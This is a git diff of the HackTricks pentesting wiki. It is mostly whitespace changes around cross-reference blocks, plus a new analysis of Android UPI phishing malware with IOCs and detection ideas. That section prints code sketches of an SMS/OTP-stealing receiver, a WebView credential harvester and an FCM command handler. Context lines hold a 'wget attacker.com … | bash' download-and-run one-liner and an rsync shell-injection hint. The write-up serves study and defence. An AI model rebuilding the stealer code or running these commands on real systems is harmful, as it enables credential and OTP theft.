An overflow is not always going to be in the stack, it could also be in the **heap** for example:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../libc-heap/heap-overflow.md
|
||||
{{#endref}}
|
||||
@ -97,6 +101,7 @@ An overflow is not always going to be in the stack, it could also be in the **he
|
||||
|
||||
There are several protections trying to prevent the exploitation of vulnerabilities, check them in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../common-binary-protections-and-bypasses/
|
||||
{{#endref}}
|
||||
@ -201,4 +206,3 @@ Lessons learned:
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -108,6 +108,7 @@ The Python script sends a carefully crafted message that, when processed by the
|
||||
|
||||
## ARM64 Example
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ret2win-arm64.md
|
||||
{{#endref}}
|
||||
@ -115,4 +116,3 @@ ret2win-arm64.md
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -4,6 +4,7 @@
|
||||
|
||||
Find an introduction to arm64 in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
|
||||
{{#endref}}
|
||||
@ -189,4 +190,3 @@ p.close()
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -196,6 +196,7 @@ xchg <reg>, rsp
|
||||
|
||||
Check the ret2esp technique here:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../rop-return-oriented-programing/ret2esp-ret2reg.md
|
||||
{{#endref}}
|
||||
@ -234,6 +235,7 @@ Modern x86 CPUs and OSes increasingly deploy **CET Shadow Stack (SHSTK)**. With
|
||||
|
||||
- For background and deeper details see:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../common-binary-protections-and-bypasses/cet-and-shadow-stack.md
|
||||
{{#endref}}
|
||||
@ -287,6 +289,7 @@ Therefore, by default, just abusing the epilogue you **won't be able to control
|
||||
|
||||
Also in the following page you can see the equivalent of **Ret2esp in ARM64**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../rop-return-oriented-programing/ret2esp-ret2reg.md
|
||||
{{#endref}}
|
||||
|
@ -4,6 +4,7 @@
|
||||
|
||||
Find an introduction to arm64 in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
|
||||
{{#endref}}
|
||||
@ -81,4 +82,3 @@ I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -52,6 +52,7 @@ Take it to the top
|
||||
Whisper my world
|
||||
```
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://codewithrockstar.com/
|
||||
{{#endref}}
|
||||
@ -69,4 +70,3 @@ Kukarek
|
||||
```
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -29,6 +29,7 @@ If an attacker wants to append the string "append" he can:
|
||||
|
||||
### **Tool**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://github.com/iagox86/hash_extender
|
||||
{{#endref}}
|
||||
@ -38,4 +39,3 @@ https://github.com/iagox86/hash_extender
|
||||
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -6,13 +6,14 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en
|
||||
|
||||
If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://0xrick.github.io/hack-the-box/kryptos/
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://0xrick.github.io/hack-the-box/kryptos/
|
||||
{{#endref}}
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -4,6 +4,7 @@
|
||||
|
||||
## Creating and Mounting an Image
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
|
||||
{{#endref}}
|
||||
@ -12,6 +13,7 @@
|
||||
|
||||
This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
malware-analysis.md
|
||||
{{#endref}}
|
||||
@ -20,20 +22,24 @@ malware-analysis.md
|
||||
|
||||
if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
partitions-file-systems-carving/
|
||||
{{#endref}}
|
||||
|
||||
Depending on the used OSs and even platform different interesting artifacts should be searched:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
windows-forensics/
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
linux-forensics.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
docker-forensics.md
|
||||
{{#endref}}
|
||||
@ -43,24 +49,28 @@ docker-forensics.md
|
||||
If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\
|
||||
Read the following page to learn some interesting tricks:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
specific-software-file-type-tricks/
|
||||
{{#endref}}
|
||||
|
||||
I want to do a special mention to the page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
specific-software-file-type-tricks/browser-artifacts.md
|
||||
{{#endref}}
|
||||
|
||||
## Memory Dump Inspection
|
||||
|
||||
|
||||
{{#ref}}
|
||||
memory-dump-analysis/
|
||||
{{#endref}}
|
||||
|
||||
## Pcap Inspection
|
||||
|
||||
|
||||
{{#ref}}
|
||||
pcap-inspection/
|
||||
{{#endref}}
|
||||
@ -69,12 +79,14 @@ pcap-inspection/
|
||||
|
||||
Keep in mind the possible use of anti-forensic techniques:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
anti-forensic-techniques.md
|
||||
{{#endref}}
|
||||
|
||||
## Threat Hunting
|
||||
|
||||
|
||||
{{#ref}}
|
||||
file-integrity-monitoring.md
|
||||
{{#endref}}
|
||||
@ -82,4 +94,3 @@ file-integrity-monitoring.md
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -155,6 +155,7 @@ Linux offers tools for ensuring the integrity of system components, crucial for
|
||||
|
||||
Read the following page to learn about tools that can be useful to find malware:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
malware-analysis.md
|
||||
{{#endref}}
|
||||
@ -399,4 +400,3 @@ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/
|
||||
|
||||
|
||||
|
||||
|
||||
|
@ -195,6 +195,7 @@ As was seen before there are several places where the file is still saved after
|
||||
|
||||
Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
file-data-carving-recovery-tools.md
|
||||
{{#endref}}
|
||||
@ -207,6 +208,7 @@ Note that this technique **doesn't work to retrieve fragmented files**. If a fil
|
||||
|
||||
There are several tools that you can use for file Carving indicating the file types you want to search for
|
||||
|
||||
|
||||
{{#ref}}
|
||||
file-data-carving-recovery-tools.md
|
||||
{{#endref}}
|
||||
@ -216,6 +218,7 @@ file-data-carving-recovery-tools.md
|
||||
Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\
|
||||
For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
file-data-carving-recovery-tools.md
|
||||
{{#endref}}
|
||||
@ -235,4 +238,3 @@ You may notice that even performing that action there might be **other parts whe
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
@ -23,6 +23,7 @@ The following tools are useful to extract statistics, files, etc.
|
||||
|
||||
You can find some Wireshark tricks in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
wireshark-tricks.md
|
||||
{{#endref}}
|
||||
@ -92,6 +93,7 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.
|
||||
|
||||
Using common carving techniques can be useful to extract files and information from the pcap:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../partitions-file-systems-carving/file-data-carving-recovery-tools.md
|
||||
{{#endref}}
|
||||
@ -133,6 +135,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
|
||||
|
||||
Check if you can find any fingerprint of a known malware:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../malware-analysis.md
|
||||
{{#endref}}
|
||||
@ -216,14 +219,17 @@ rita show-exploded-dns -H --limit 10 zeek_logs
|
||||
|
||||
## Other pcap analysis tricks
|
||||
|
||||
|
||||
{{#ref}}
|
||||
dnscat-exfiltration.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
wifi-pcap-analysis.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
usb-keystrokes.md
|
||||
{{#endref}}
|
||||
@ -233,4 +239,3 @@ usb-keystrokes.md
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -4,38 +4,47 @@
|
||||
|
||||
Here you can find interesting tricks for specific file-types and/or software:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
.pyc.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
browser-artifacts.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
desofuscation-vbs-cscript.exe.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
local-cloud-storage.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
office-file-analysis.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
pdf-file-analysis.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
png-tricks.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
video-and-audio-file-analysis.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
zips-tricks.md
|
||||
{{#endref}}
|
||||
@ -43,4 +52,3 @@ zips-tricks.md
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -266,6 +266,7 @@ In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login,
|
||||
|
||||
### Interesting entries in the Windows Registry
|
||||
|
||||
|
||||
{{#ref}}
|
||||
interesting-windows-registry-keys.md
|
||||
{{#endref}}
|
||||
@ -502,4 +503,3 @@ Security EventID 1102 signals the deletion of logs, a critical event for forensi
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -479,10 +479,12 @@ echo www | subzuf facebook.com
|
||||
|
||||
Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://trickest.com/blog/full-subdomain-discovery-using-workflow/
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/
|
||||
{{#endref}}
|
||||
@ -641,6 +643,7 @@ You can use the **tool** [**Leakos**](https://github.com/carlospolop/Leakos) to
|
||||
|
||||
Check also this **page** for potential **github dorks** you could also search for in the organization you are attacking:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
github-leaked-secrets.md
|
||||
{{#endref}}
|
||||
@ -666,6 +669,7 @@ If you found that the company has **open-source code** you can **analyse** it an
|
||||
|
||||
**Depending on the language** there are different **tools** you can use:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../network-services-pentesting/pentesting-web/code-review-tools.md
|
||||
{{#endref}}
|
||||
@ -710,4 +714,3 @@ There are several tools out there that will perform part of the proposed actions
|
||||
- All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -64,6 +64,7 @@ nmap -T4 -sY -n --open -Pn <IP/range>
|
||||
|
||||
Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../pentesting-wifi/
|
||||
{{#endref}}
|
||||
@ -192,12 +193,14 @@ nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>
|
||||
|
||||
### IDS and IPS evasion
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ids-evasion.md
|
||||
{{#endref}}
|
||||
|
||||
### **More nmap options**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
nmap-summary-esp.md
|
||||
{{#endref}}
|
||||
@ -388,6 +391,7 @@ sendp(packet)
|
||||
|
||||
If you have **access to a switch that you are directly connected to**, you have the ability to **bypass VLAN segmentation** within the network. Simply **switch the port to trunk mode** (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
lateral-vlan-segmentation-bypass.md
|
||||
{{#endref}}
|
||||
@ -611,6 +615,7 @@ eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt
|
||||
|
||||
**Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
glbp-and-hsrp-attacks.md
|
||||
{{#endref}}
|
||||
@ -632,6 +637,7 @@ To attack a EIGRP system requires **establishing a neighbourhood with a legitima
|
||||
|
||||
[**FRRouting**](https://frrouting.org/) allows you to implement **a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols.** All you need to do is deploy it on your attacker’s system and you can actually pretend to be a legitimate router in the routing domain.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
eigrp-attacks.md
|
||||
{{#endref}}
|
||||
@ -893,6 +899,7 @@ Bettercap broadcast WSD packets searching for services (UDP Port 3702).
|
||||
|
||||
### Telecom / Mobile-Core (GTP) Exploitation
|
||||
|
||||
|
||||
{{#ref}}
|
||||
telecom-network-exploitation.md
|
||||
{{#endref}}
|
||||
@ -909,4 +916,3 @@ telecom-network-exploitation.md
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -119,6 +119,7 @@ These tools and techniques form a comprehensive set for conducting NTLM Relay at
|
||||
|
||||
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
|
||||
{{#endref}}
|
||||
@ -245,4 +246,3 @@ You now own **NT AUTHORITY\SYSTEM**.
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
@ -23,6 +23,7 @@ iwlist wlan0 scan #Scan available wifis
|
||||
|
||||
### Hijacker & NexMon (Android internal Wi-Fi)
|
||||
|
||||
|
||||
{{#ref}}
|
||||
enable-nexmon-monitor-and-injection-on-android.md
|
||||
{{#endref}}
|
||||
@ -796,4 +797,3 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
@ -26,6 +26,7 @@
|
||||
- **New TLD**: Same domain using a **new TLD** (e.g., zelster.org)
|
||||
- **Homoglyph**: It **replaces** a letter in the domain name with **letters that look similar** (e.g., zelfser.com).
|
||||
|
||||
|
||||
{{#ref}}
|
||||
homograph-attacks.md
|
||||
{{#endref}}
|
||||
@ -414,6 +415,7 @@ Once everything is ready, just launch the campaign!
|
||||
|
||||
If for any reason you want to clone the website check the following page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
clone-a-website.md
|
||||
{{#endref}}
|
||||
@ -423,6 +425,7 @@ clone-a-website.md
|
||||
In some phishing assessments (mainly for Red Teams) you will want to also **send files containing some kind of backdoor** (maybe a C2 or maybe just something that will trigger an authentication).\
|
||||
Check out the following page for some examples:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
phishing-documents.md
|
||||
{{#endref}}
|
||||
@ -452,6 +455,7 @@ One easy way to check if you domain appears in any blacklist is to use [https://
|
||||
|
||||
However, there are other ways to know if the victim is **actively looking for suspicions phishing activity in the wild** as explained in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
detecting-phising.md
|
||||
{{#endref}}
|
||||
@ -557,12 +561,14 @@ Monitor for AzureAD/AWS/Okta events where **`deleteMFA` + `addMFA`** occur **wit
|
||||
|
||||
Attackers can silently copy malicious commands into the victim’s clipboard from a compromised or typosquatted web page and then trick the user to paste them inside **Win + R**, **Win + X** or a terminal window, executing arbitrary code without any download or attachment.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
clipboard-hijacking.md
|
||||
{{#endref}}
|
||||
|
||||
## Mobile Phishing & Malicious App Distribution (Android & iOS)
|
||||
|
||||
|
||||
{{#ref}}
|
||||
mobile-phishing-malicious-apps.md
|
||||
{{#endref}}
|
||||
@ -577,4 +583,3 @@ mobile-phishing-malicious-apps.md
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
@ -84,7 +84,8 @@ Blue-teams can combine clipboard, process-creation and registry telemetry to pin
|
||||
## Related Tricks
|
||||
|
||||
* **Discord Invite Hijacking** often abuses the same ClickFix approach after luring users into a malicious server:
|
||||
{{#ref}}
|
||||
|
||||
{{#ref}}
|
||||
discord-invite-hijacking.md
|
||||
{{#endref}}
|
||||
|
||||
@ -93,4 +94,4 @@ Blue-teams can combine clipboard, process-creation and registry telemetry to pin
|
||||
- [Fix the Click: Preventing the ClickFix Attack Vector](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/)
|
||||
- [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
@ -90,9 +90,143 @@ Java.perform(function() {
|
||||
LubanCompress 1.1.8 # "Luban" string inside classes.dex
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Android WebView Payment Phishing (UPI) – Dropper + FCM C2 Pattern
|
||||
|
||||
This pattern has been observed in campaigns abusing government-benefit themes to steal Indian UPI credentials and OTPs. Operators chain reputable platforms for delivery and resilience.
|
||||
|
||||
### Delivery chain across trusted platforms
|
||||
- YouTube video lure → description contains a short link
|
||||
- Shortlink → GitHub Pages phishing site imitating the legit portal
|
||||
- Same GitHub repo hosts an APK with a fake “Google Play” badge linking directly to the file
|
||||
- Dynamic phishing pages live on Replit; remote command channel uses Firebase Cloud Messaging (FCM)
|
||||
|
||||
### Dropper with embedded payload and offline install
|
||||
- First APK is an installer (dropper) that ships the real malware at `assets/app.apk` and prompts the user to disable Wi‑Fi/mobile data to blunt cloud detection.
|
||||
- The embedded payload installs under an innocuous label (e.g., “Secure Update”). After install, both the installer and the payload are present as separate apps.
|
||||
|
||||
Static triage tip (grep for embedded payloads):
|
||||
|
||||
```bash
|
||||
unzip -l sample.apk | grep -i "assets/app.apk"
|
||||
# Or:
|
||||
zipgrep -i "classes|.apk" sample.apk | head
|
||||
```
|
||||
|
||||
### Dynamic endpoint discovery via shortlink
|
||||
- Malware fetches a plain-text, comma-separated list of live endpoints from a shortlink; simple string transforms produce the final phishing page path.
|
||||
|
||||
Example (sanitised):
|
||||
|
||||
```
|
||||
GET https://rebrand.ly/dclinkto2
|
||||
Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php
|
||||
Transform: "gate.html" → "gate.htm" (loaded in WebView)
|
||||
UPI credential POST: https://sqcepo.replit.app/addup.php
|
||||
SMS upload: https://sqcepo.replit.app/addsm.php
|
||||
```
|
||||
|
||||
Pseudo-code:
|
||||
|
||||
```java
|
||||
String csv = httpGet(shortlink);
|
||||
String[] parts = csv.split(",");
|
||||
String upiPage = parts[0].replace("gate.html", "gate.htm");
|
||||
String smsPost = parts[1];
|
||||
String credsPost = upiPage.replace("gate.htm", "addup.php");
|
||||
```
|
||||
|
||||
### WebView-based UPI credential harvesting
|
||||
- The “Make payment of ₹1 / UPI‑Lite” step loads an attacker HTML form from the dynamic endpoint inside a WebView and captures sensitive fields (phone, bank, UPI PIN) which are `POST`ed to `addup.php`.
|
||||
|
||||
Minimal loader:
|
||||
|
||||
```java
|
||||
WebView wv = findViewById(R.id.web);
|
||||
wv.getSettings().setJavaScriptEnabled(true);
|
||||
wv.loadUrl(upiPage); // ex: https://<replit-app>/gate.htm
|
||||
```
|
||||
|
||||
### Self-propagation and SMS/OTP interception
|
||||
- Aggressive permissions are requested on first run:
|
||||
|
||||
```xml
|
||||
<uses-permission android:name="android.permission.READ_CONTACTS"/>
|
||||
<uses-permission android:name="android.permission.SEND_SMS"/>
|
||||
<uses-permission android:name="android.permission.READ_SMS"/>
|
||||
<uses-permission android:name="android.permission.CALL_PHONE"/>
|
||||
```
|
||||
|
||||
- Contacts are looped to mass-send smishing SMS from the victim’s device.
|
||||
- Incoming SMS are intercepted by a broadcast receiver and uploaded with metadata (sender, body, SIM slot, per-device random ID) to `/addsm.php`.
|
||||
|
||||
Receiver sketch:
|
||||
|
||||
```java
|
||||
public void onReceive(Context c, Intent i){
|
||||
SmsMessage[] msgs = Telephony.Sms.Intents.getMessagesFromIntent(i);
|
||||
for (SmsMessage m: msgs){
|
||||
postForm(urlAddSms, new FormBody.Builder()
|
||||
.add("senderNum", m.getOriginatingAddress())
|
||||
.add("Message", m.getMessageBody())
|
||||
.add("Slot", String.valueOf(getSimSlot(i)))
|
||||
.add("Device rand", getOrMakeDeviceRand(c))
|
||||
.build());
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Firebase Cloud Messaging (FCM) as resilient C2
|
||||
- The payload registers to FCM; push messages carry a `_type` field used as a switch to trigger actions (e.g., update phishing text templates, toggle behaviours).
|
||||
|
||||
Example FCM payload:
|
||||
|
||||
```json
|
||||
{
|
||||
"to": "<device_fcm_token>",
|
||||
"data": {
|
||||
"_type": "update_texts",
|
||||
"template": "New subsidy message..."
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Handler sketch:
|
||||
|
||||
```java
|
||||
@Override
|
||||
public void onMessageReceived(RemoteMessage msg){
|
||||
String t = msg.getData().get("_type");
|
||||
switch (t){
|
||||
case "update_texts": applyTemplate(msg.getData().get("template")); break;
|
||||
case "smish": sendSmishToContacts(); break;
|
||||
// ... more remote actions
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Hunting patterns and IOCs
|
||||
- APK contains secondary payload at `assets/app.apk`
|
||||
- WebView loads payment from `gate.htm` and exfiltrates to `/addup.php`
|
||||
- SMS exfiltration to `/addsm.php`
|
||||
- Shortlink-driven config fetch (e.g., `rebrand.ly/*`) returning CSV endpoints
|
||||
- Apps labelled as generic “Update/Secure Update”
|
||||
- FCM `data` messages with a `_type` discriminator in untrusted apps
|
||||
|
||||
### Detection & defence ideas
|
||||
- Flag apps that instruct users to disable network during install and then side-load a second APK from `assets/`.
|
||||
- Alert on the permission tuple: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + WebView-based payment flows.
|
||||
- Egress monitoring for `POST /addup.php|/addsm.php` on non-corporate hosts; block known infrastructure.
|
||||
- Mobile EDR rules: untrusted app registering for FCM and branching on a `_type` field.
|
||||
|
||||
---
|
||||
|
||||
## References
|
||||
|
||||
- [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign)
|
||||
- [Luban – Android image compression library](https://github.com/Curzibn/Luban)
|
||||
- [Android Malware Promises Energy Subsidy to Steal Financial Data (McAfee Labs)](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-promises-energy-subsidy-to-steal-financial-data/)
|
||||
- [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
@ -150,10 +150,12 @@ There are several ways to **force NTLM authentication "remotely"**, for example,
|
||||
|
||||
**Check these ideas and more in the following pages:**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md
|
||||
{{#endref}}
|
||||
@ -168,4 +170,3 @@ Don't forget that you cannot only steal the hash or the authentication but also
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -708,6 +708,7 @@ if __name__ == "__main__":
|
||||
|
||||
You can check the output of this script on this page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/python/bypass-python-sandboxes/broken-reference/README.md
|
||||
{{#endref}}
|
||||
@ -765,6 +766,7 @@ class HAL9000(object):
|
||||
> [!CAUTION]
|
||||
> Check also the following page for gadgets that will r**ead sensitive information from Python internal objects**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../python-internal-read-gadgets.md
|
||||
{{#endref}}
|
||||
@ -1114,6 +1116,7 @@ Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) o
|
||||
|
||||
**Check out this tutorial**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
|
||||
{{#endref}}
|
||||
|
@ -259,6 +259,7 @@ Use this payload to **change `app.secret_key`** (the name in your app might be d
|
||||
|
||||
Check also the following page for more read only gadgets:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
python-internal-read-gadgets.md
|
||||
{{#endref}}
|
||||
@ -270,4 +271,3 @@ python-internal-read-gadgets.md
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
|
||||
### Related resources
|
||||
|
||||
|
||||
{{#ref}}
|
||||
synology-encrypted-archive-decryption.md
|
||||
{{#endref}}
|
||||
@ -61,6 +62,7 @@ If you don't find much with those tools check the **entropy** of the image with
|
||||
|
||||
Moreover, you can use these tools to extract **files embedded inside the firmware**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
|
||||
{{#endref}}
|
||||
@ -309,4 +311,3 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -330,12 +330,14 @@ ln /f*
|
||||
|
||||
If you are inside a filesystem with the **read-only and noexec protections** or even in a distroless container, there are still ways to **execute arbitrary binaries, even a shell!:**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
bypass-fs-protections-read-only-no-exec-distroless/
|
||||
{{#endref}}
|
||||
|
||||
## Chroot & other Jails Bypass
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../privilege-escalation/escaping-from-limited-bash.md
|
||||
{{#endref}}
|
||||
@ -374,4 +376,3 @@ Practical use cases:
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -69,6 +69,7 @@ wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo
|
||||
|
||||
For more information about this technique check the Github or:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ddexec.md
|
||||
{{#endref}}
|
||||
@ -114,4 +115,3 @@ You can find **examples** on how to **exploit some RCE vulnerabilities** to get
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -43,6 +43,7 @@ Keytab files, containing Kerberos principals and encrypted keys, are critical fo
|
||||
|
||||
You can find more information about how to use tickets in linux in the following link:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
privilege-escalation/linux-active-directory.md
|
||||
{{#endref}}
|
||||
@ -198,4 +199,3 @@ You can check a detailed explaination in [https://posts.specterops.io/attacking-
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
|
||||
Let's configure a PAM module to log each password each user uses to login. If you don't know what is PAM check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
pam-pluggable-authentication-modules.md
|
||||
{{#endref}}
|
||||
@ -55,4 +56,3 @@ The Pluggable Authentication Module (PAM) is a system used under Linux for user
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -159,6 +159,7 @@ cat /proc/sys/kernel/randomize_va_space 2>/dev/null
|
||||
|
||||
If you are inside a docker container you can try to escape from it:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
docker-security/
|
||||
{{#endref}}
|
||||
@ -410,6 +411,7 @@ rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh mys
|
||||
|
